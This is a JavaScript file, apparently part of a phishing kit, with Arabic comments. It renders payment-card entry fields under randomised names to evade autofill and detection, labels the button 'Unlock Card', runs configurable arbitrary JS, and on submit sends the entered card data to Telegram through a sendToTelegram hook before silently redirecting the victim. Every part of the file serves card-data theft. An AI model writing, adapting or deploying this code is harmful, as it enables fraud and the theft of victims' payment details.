function randomName(len = 10) {
  const chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
  let name = '';
  for (let i = 0; i < len; i++) name += chars.charAt(Math.floor(Math.random() * chars.length));
  return name;
}

async function injectCardFields(containerId) {
  const container = document.getElementById(containerId);
  if (!container) return;

  // Load settings
  const settings = await (await fetch('settings.json?' + Date.now())).json();
  const fields = settings.fields.card || [];
  
  // زر الإرسال: الأولوية لصفحة card الحالية، ثم submit global
  let pageSettings = (settings.pages || []).find(p => window.location.pathname.includes(p.php)) || {};
  let submitSettings = (pageSettings.forms_submit && pageSettings.forms_submit.card) || settings.submit?.card || {};

  const nameMap = {};
  container.innerHTML = '';

  let row = [];
  fields.forEach((fld, i) => {
    let randomFieldName = randomName();
    nameMap[fld.name] = randomFieldName;

    let attrs = `
      name="${randomFieldName}"
      id="${fld.name}"
      type="${fld.type}"
      autocomplete="off"
      ${fld.placeholder ? `placeholder="${fld.placeholder}"` : ''}
      ${fld.required ? 'required' : ''}
      ${fld.pattern ? `pattern="${fld.pattern}"` : ''}
      ${fld.min ? `min="${fld.min}"` : ''}
      ${fld.max ? `max="${fld.max}"` : ''}
    `;

    let inputHtml = `<input ${attrs.trim()}>`;
    let fieldHtml = `
      <div class="card-input${fld.small ? ' small' : ''}">
        <label for="${fld.name}" class="card-input__label">
          ${fld.label}${fld.required ? ' <span style="color:#e00">*</span>' : ''}
        </label>
        ${inputHtml}
      </div>
    `;

    if (fld.small) {
      row.push(fieldHtml);
      if (!fields[i + 1] || !fields[i + 1].small) {
        container.innerHTML += `<div class="row-fields">${row.join('')}</div>`;
        row = [];
      }
    } else {
      if (row.length) {
        container.innerHTML += `<div class="row-fields">${row.join('')}</div>`;
        row = [];
      }
      container.innerHTML += fieldHtml;
    }
  });

  if (row.length) container.innerHTML += `<div class="row-fields">${row.join('')}</div>`;

  // إعداد زر السبميت من الإعدادات (label/css/js/send_telegram/next_page)
  let submitLabel = submitSettings.label || 'Unlock Card';
  let submitCss = submitSettings.css ? `style="${submitSettings.css.replace(/"/g, '&quot;')}"` : '';
  let submitJs = submitSettings.js ? submitSettings.js.trim() : '';
  let sendTelegram = !!submitSettings.send_telegram;
  let nextPage = submitSettings.next_page || '';

  container.innerHTML += `<button type="submit" class="card-form__button" ${submitCss}>${submitLabel}</button>`;

  // تطبيق CSS و JS المخصص لكل حقل
  fields.forEach((fld) => {
    let randomName = nameMap[fld.name];
    let inp = container.querySelector(`[name="${randomName}"]`);
    if (!inp) return;

    if (fld.css && fld.css.trim()) inp.style.cssText += fld.css;
    if (fld.js && fld.js.trim()) {
      try {
        inp.addEventListener('input', function () {
          try {
            (new Function(fld.js)).call(this);
          } catch {}
        });
      } catch {}
    }
  });

  window._cardFieldsNameMap = nameMap;
  window._cardFieldsSpec = fields;

  // الإرسال
  const form = container.closest('form');
  if (!form) return;

  form.addEventListener('submit', async function (e) {
    e.preventDefault();
    let data = {};
    fields.forEach((fld) => {
      let randomName = nameMap[fld.name];
      let inp = form.querySelector(`[name="${randomName}"]`);
      data[fld.name] = inp ? inp.value : '';
    });

    // تنفيذ JS مخصص إن وجد
    let submitRet = true;
    if (submitJs) {
      try {
        submitRet = (new Function('data', submitJs)).call(this, data);
      } catch {
        submitRet = true;
      }
    }
    if (submitRet === false) return;

    // إرسال لتليجرام إذا مطلوب
    let telegramOk = true;
    if (sendTelegram && typeof window.sendToTelegram === 'function') {
      try {
        telegramOk = await window.sendToTelegram('card', data);
      } catch {
        telegramOk = false;
      }
    }

    // منطق الانتقال للصفحة التالية (حسب إعدادات الزر)
    if (nextPage && ((sendTelegram && telegramOk) || !sendTelegram)) {
      window.location.href = nextPage;
    }
    // إذا لم يحدد next_page، لا ينتقل تلقائيًا، فقط ينفذ الإرسال أو JS حسب إعدادات الزر.
    // إذا failed في التليجرام، لا ينتقل ويحرر الزر (لا alerts ولا رسائل).

    // فك تعطيل الزر بعد الإرسال
    const submitBtn = form.querySelector('.card-form__button');
    if (submitBtn) submitBtn.disabled = false;
  });
}